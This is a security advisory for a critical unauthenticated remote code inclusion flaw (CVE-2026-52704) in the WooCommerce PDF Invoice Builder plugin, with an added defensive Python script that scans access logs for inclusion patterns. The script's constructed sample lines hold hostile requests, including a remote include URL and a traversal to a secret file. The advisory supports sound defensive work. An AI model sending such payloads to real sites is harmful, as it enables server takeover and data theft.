CVE-2026-52704

Edgar Rojas · WooCommerce PDF Invoice Builder

A code injection vulnerability in the WooCommerce PDF Invoice Builder plugin allows unauthenticated remote attackers to perform remote code inclusion.

Executive summary

A critical remote code inclusion vulnerability in the WooCommerce PDF Invoice Builder plugin permits unauthenticated attackers to execute arbitrary code on the host server.

Vulnerability

This is an Improper Control of Generation of Code vulnerability that facilitates Remote Code Inclusion. The flaw is exploitable by unauthenticated remote attackers, requiring no prior system access or credentials to trigger.

Business impact

This vulnerability carries a maximum CVSS score of 10.0, representing the highest level of severity. Exploitation allows for complete server takeover, resulting in potential data theft, installation of malicious backdoors, and total loss of confidentiality, integrity, and availability for the affected web store.

Remediation

Immediate Action: Update the WooCommerce PDF Invoice Builder plugin to a version greater than 2.0.8 without delay.

Proactive Monitoring: Audit web server access logs for suspicious requests containing unexpected file paths or code execution payloads directed at the plugin directory.

Compensating Controls: Deploy a Web Application Firewall (WAF) with rules configured to detect and block common code injection and remote file inclusion patterns.
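The log audit and WAF-pattern recommendations above can be turned into a concrete triage pass. The following Python script is an added example, not part of the advisory and not code from the plugin or its author: it parses combined-format web server access log lines, keeps only requests aimed at the plugin directory, and flags parameter values that look like remote URLs, PHP stream wrappers, directory traversal, or null-byte injection. The plugin directory slug, the parameter name `file`, and every log line are constructed placeholders (the advisory names none of them); substitute the real path as installed on your site and feed it your own logs.

```python
"""Added example: triage access-log requests aimed at a plugin directory for
file-inclusion-style parameter values. Constructed for illustration only."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: the real plugin directory is not named in the advisory, so a
# labelled placeholder is used here. Replace it with the path on your site.
PLUGIN_DIR = "/wp-content/plugins/PLUGIN-SLUG-PLACEHOLDER/"

# Apache/nginx "combined" log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Generic indicators of remote/local file inclusion attempts inside a value.
# Order matters only for the order of reported hits.
INDICATORS = {
    "remote_url": re.compile(r"^(https?|ftps?)://", re.I),
    "stream_wrapper": re.compile(r"^(php|data|expect|phar|file|zip)://", re.I),
    "path_traversal": re.compile(r"(\.\./|\.\.\\|%2e%2e%2f)", re.I),
    "null_byte": re.compile(r"%00|\x00"),
}


def classify(target):
    """Return [(param, indicator), ...] for a request target, or [] if the
    request is outside the plugin directory or carries nothing suspicious."""
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_DIR):
        return []
    hits = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decodes once; decode a second time so that
        # double-encoded payloads (e.g. %252e%252e%252f) are also caught.
        for candidate in (value, unquote(value)):
            for name, pattern in INDICATORS.items():
                if pattern.search(candidate) and (key, name) not in hits:
                    hits.append((key, name))
    # Traversal can also appear directly in the path component.
    if INDICATORS["path_traversal"].search(unquote(parts.path)):
        hits.append(("<path>", "path_traversal"))
    return hits


def scan(lines):
    """Parse log lines and return a finding per request that hits an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line; skip
        hits = classify(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": m.group("status"),
                "target": m.group("target"),
                "indicators": hits,
            })
    return findings


# Constructed sample log lines (not real traffic). The 203.0.113.0/24 range is
# reserved for documentation.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2026:12:00:01 +0000] "GET /wp-content/plugins/PLUGIN-SLUG-PLACEHOLDER/assets/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2026:12:00:02 +0000] "GET /wp-content/plugins/PLUGIN-SLUG-PLACEHOLDER/generate.php?order=1234 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2026:12:00:03 +0000] "GET /wp-content/plugins/PLUGIN-SLUG-PLACEHOLDER/generate.php?file=http://203.0.113.5/inc.txt HTTP/1.1" 200 77 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Mar/2026:12:00:04 +0000] "GET /wp-content/plugins/PLUGIN-SLUG-PLACEHOLDER/generate.php?file=..%2F..%2F..%2Fsecret.txt HTTP/1.1" 404 0 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2026:12:00:05 +0000] "GET /wp-content/plugins/other-plugin/view.php?u=http://example.com HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
    "garbage line that does not match the log format",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["indicators"], f["target"])
```

Only the two requests that both target the placeholder plugin directory and carry an inclusion-style value are reported; the request to a different plugin with a URL parameter is ignored because the advisory scopes the audit to the affected plugin's directory. Widening `PLUGIN_DIR` to `/wp-content/plugins/` turns the same logic into a site-wide sweep, at the cost of more benign hits to review.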

Exploitation status

Public Exploit Available: True

Analyst recommendation

The availability of public exploit code combined with the unauthenticated nature of this vulnerability necessitates an emergency patching cycle. All instances of the affected plugin must be updated immediately to prevent compromise.